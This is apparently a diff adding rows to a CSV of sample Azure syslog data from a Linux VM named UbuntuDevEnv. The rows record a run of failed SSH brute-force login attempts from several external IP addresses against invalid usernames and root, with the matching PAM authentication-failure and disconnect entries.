+12847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:16,UbuntuDevEnv,2019-06-26 04:00:15,auth,UbuntuDevEnv,info,Failed password for invalid user suo from 106.13.4.172 port 43892 ssh2,120799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suo,106.13.4.1,43892,,
+12848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:16,UbuntuDevEnv,2019-06-26 04:00:16,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 43892:11: Bye Bye [preauth],120799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,43892,,
+12849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:16,UbuntuDevEnv,2019-06-26 04:00:16,auth,UbuntuDevEnv,info,Disconnected from invalid user suo 106.13.4.172 port 43892 [preauth],120799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suo,106.13.4.1,43892,,
+12850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:50,UbuntuDevEnv,2019-06-26 04:00:50,auth,UbuntuDevEnv,info,Invalid user dustin from 118.24.131.236 port 46290,120978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dustin,118.24.131.2,46290,,
+12851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:50,UbuntuDevEnv,2019-06-26 04:00:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:50,UbuntuDevEnv,2019-06-26 04:00:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,120978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:51,UbuntuDevEnv,2019-06-26 04:00:51,auth,UbuntuDevEnv,info,Invalid user pentakill from 106.13.4.172 port 48760,120986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentakill,106.13.4.1,48760,,
+12854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:51,UbuntuDevEnv,2019-06-26 04:00:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,120986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:51,UbuntuDevEnv,2019-06-26 04:00:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:52,UbuntuDevEnv,2019-06-26 04:00:51,auth,UbuntuDevEnv,info,Failed password for invalid user dustin from 118.24.131.236 port 46290 ssh2,120978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dustin,118.24.131.2,46290,,
+12857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:52,UbuntuDevEnv,2019-06-26 04:00:52,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 46290:11: Bye Bye [preauth],120978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,46290,,
+12858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:52,UbuntuDevEnv,2019-06-26 04:00:52,auth,UbuntuDevEnv,info,Disconnected from invalid user dustin 118.24.131.236 port 46290 [preauth],120978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dustin,118.24.131.2,46290,,
+12859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:53,UbuntuDevEnv,2019-06-26 04:00:52,auth,UbuntuDevEnv,info,Failed password for invalid user pentakill from 106.13.4.172 port 48760 ssh2,120986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentakill,106.13.4.1,48760,,
+12860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:53,UbuntuDevEnv,2019-06-26 04:00:53,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 48760:11: Bye Bye [preauth],120986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,48760,,
+12861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:53,UbuntuDevEnv,2019-06-26 04:00:53,auth,UbuntuDevEnv,info,Disconnected from invalid user pentakill 106.13.4.172 port 48760 [preauth],120986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentakill,106.13.4.1,48760,,
+12862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:01:28,UbuntuDevEnv,2019-06-26 04:01:27,auth,UbuntuDevEnv,info,Invalid user reception2 from 106.13.4.172 port 53624,121119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reception2,106.13.4.1,53624,,
+12863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:01:28,UbuntuDevEnv,2019-06-26 04:01:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:01:28,UbuntuDevEnv,2019-06-26 04:01:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,121119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:01:30,UbuntuDevEnv,2019-06-26 04:01:30,auth,UbuntuDevEnv,info,Failed password for invalid user reception2 from 106.13.4.172 port 53624 ssh2,121119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reception2,106.13.4.1,53624,,
+12866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:01:30,UbuntuDevEnv,2019-06-26 04:01:30,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 53624:11: Bye Bye [preauth],121119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,53624,,
+12867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:01:30,UbuntuDevEnv,2019-06-26 04:01:30,auth,UbuntuDevEnv,info,Disconnected from invalid user reception2 106.13.4.172 port 53624 [preauth],121119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reception2,106.13.4.1,53624,,
+12868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:07,UbuntuDevEnv,2019-06-26 04:02:06,auth,UbuntuDevEnv,info,Invalid user myuser1 from 106.13.4.172 port 58490,121254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,myuser1,106.13.4.1,58490,,
+12869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:07,UbuntuDevEnv,2019-06-26 04:02:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:07,UbuntuDevEnv,2019-06-26 04:02:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,121254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:08,UbuntuDevEnv,2019-06-26 04:02:08,auth,UbuntuDevEnv,info,Failed password for invalid user myuser1 from 106.13.4.172 port 58490 ssh2,121254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,myuser1,106.13.4.1,58490,,
+12872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:09,UbuntuDevEnv,2019-06-26 04:02:08,auth,UbuntuDevEnv,info,Disconnected from invalid user myuser1 106.13.4.172 port 58490 [preauth],121254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,myuser1,106.13.4.1,58490,,
+12873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:09,UbuntuDevEnv,2019-06-26 04:02:08,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 58490:11: Bye Bye [preauth],121254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,58490,,
+12874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:20,UbuntuDevEnv,2019-06-26 04:02:19,auth,UbuntuDevEnv,info,Invalid user temporal from 118.24.131.236 port 58980,121306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temporal,118.24.131.2,58980,,
+12875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:20,UbuntuDevEnv,2019-06-26 04:02:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,121306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:20,UbuntuDevEnv,2019-06-26 04:02:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:22,UbuntuDevEnv,2019-06-26 04:02:21,auth,UbuntuDevEnv,info,Failed password for invalid user temporal from 118.24.131.236 port 58980 ssh2,121306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temporal,118.24.131.2,58980,,
+12878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:22,UbuntuDevEnv,2019-06-26 04:02:22,auth,UbuntuDevEnv,info,Disconnected from invalid user temporal 118.24.131.236 port 58980 [preauth],121306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temporal,118.24.131.2,58980,,
+12879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:22,UbuntuDevEnv,2019-06-26 04:02:22,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 58980:11: Bye Bye [preauth],121306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,58980,,
+12880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:44,UbuntuDevEnv,2019-06-26 04:02:43,auth,UbuntuDevEnv,info,Invalid user teste from 106.13.4.172 port 35120,121393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,106.13.4.1,35120,,
+12881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:44,UbuntuDevEnv,2019-06-26 04:02:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,121393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:44,UbuntuDevEnv,2019-06-26 04:02:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:45,UbuntuDevEnv,2019-06-26 04:02:45,auth,UbuntuDevEnv,info,Failed password for invalid user teste from 106.13.4.172 port 35120 ssh2,121393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,106.13.4.1,35120,,
+12884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:45,UbuntuDevEnv,2019-06-26 04:02:45,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 35120:11: Bye Bye [preauth],121393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,35120,,
+12885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:02:45,UbuntuDevEnv,2019-06-26 04:02:45,auth,UbuntuDevEnv,info,Disconnected from invalid user teste 106.13.4.172 port 35120 [preauth],121393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,106.13.4.1,35120,,
+12886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:23,UbuntuDevEnv,2019-06-26 04:03:22,auth,UbuntuDevEnv,info,Invalid user h1rnt0t from 106.13.4.172 port 39988,121531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,h1rnt0t,106.13.4.1,39988,,
+12887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:23,UbuntuDevEnv,2019-06-26 04:03:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,121531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:23,UbuntuDevEnv,2019-06-26 04:03:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:25,UbuntuDevEnv,2019-06-26 04:03:25,auth,UbuntuDevEnv,info,Failed password for invalid user h1rnt0t from 106.13.4.172 port 39988 ssh2,121531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,h1rnt0t,106.13.4.1,39988,,
+12890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:26,UbuntuDevEnv,2019-06-26 04:03:25,auth,UbuntuDevEnv,info,Disconnected from invalid user h1rnt0t 106.13.4.172 port 39988 [preauth],121531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,h1rnt0t,106.13.4.1,39988,,
+12891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:26,UbuntuDevEnv,2019-06-26 04:03:25,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 39988:11: Bye Bye [preauth],121531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,39988,,
+12892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:49,UbuntuDevEnv,2019-06-26 04:03:48,auth,UbuntuDevEnv,info,Invalid user sinusbot from 118.24.131.236 port 43444,121623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,118.24.131.2,43444,,
+12893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:49,UbuntuDevEnv,2019-06-26 04:03:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:49,UbuntuDevEnv,2019-06-26 04:03:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,121623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:51,UbuntuDevEnv,2019-06-26 04:03:50,auth,UbuntuDevEnv,info,Failed password for invalid user sinusbot from 118.24.131.236 port 43444 ssh2,121623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,118.24.131.2,43444,,
+12896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:51,UbuntuDevEnv,2019-06-26 04:03:50,auth,UbuntuDevEnv,info,Disconnected from invalid user sinusbot 118.24.131.236 port 43444 [preauth],121623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,118.24.131.2,43444,,
+12897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:03:51,UbuntuDevEnv,2019-06-26 04:03:50,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 43444:11: Bye Bye [preauth],121623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,43444,,
+12898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:04:51,UbuntuDevEnv,2019-06-26 04:04:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10  user=root,121841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,177.23.90.1,,0,
+12899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:04:53,UbuntuDevEnv,2019-06-26 04:04:52,auth,UbuntuDevEnv,info,Failed password for root from 177.23.90.10 port 54502 ssh2,121841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,54502,,
+12900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:04:53,UbuntuDevEnv,2019-06-26 04:04:53,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 54502:11: Bye Bye [preauth],121841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,54502,,
+12901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:04:53,UbuntuDevEnv,2019-06-26 04:04:53,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 177.23.90.10 port 54502 [preauth],121841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,177.23.90.1,54502,,
+12902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:05:25,UbuntuDevEnv,2019-06-26 04:05:24,auth,UbuntuDevEnv,info,Invalid user facturacion from 118.24.131.236 port 56150,121957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,facturacion,118.24.131.2,56150,,
+12903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:05:25,UbuntuDevEnv,2019-06-26 04:05:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:05:25,UbuntuDevEnv,2019-06-26 04:05:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,121957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:05:26,UbuntuDevEnv,2019-06-26 04:05:26,auth,UbuntuDevEnv,info,Failed password for invalid user facturacion from 118.24.131.236 port 56150 ssh2,121957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,facturacion,118.24.131.2,56150,,
+12906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:05:26,UbuntuDevEnv,2019-06-26 04:05:26,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 56150:11: Bye Bye [preauth],121957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,56150,,
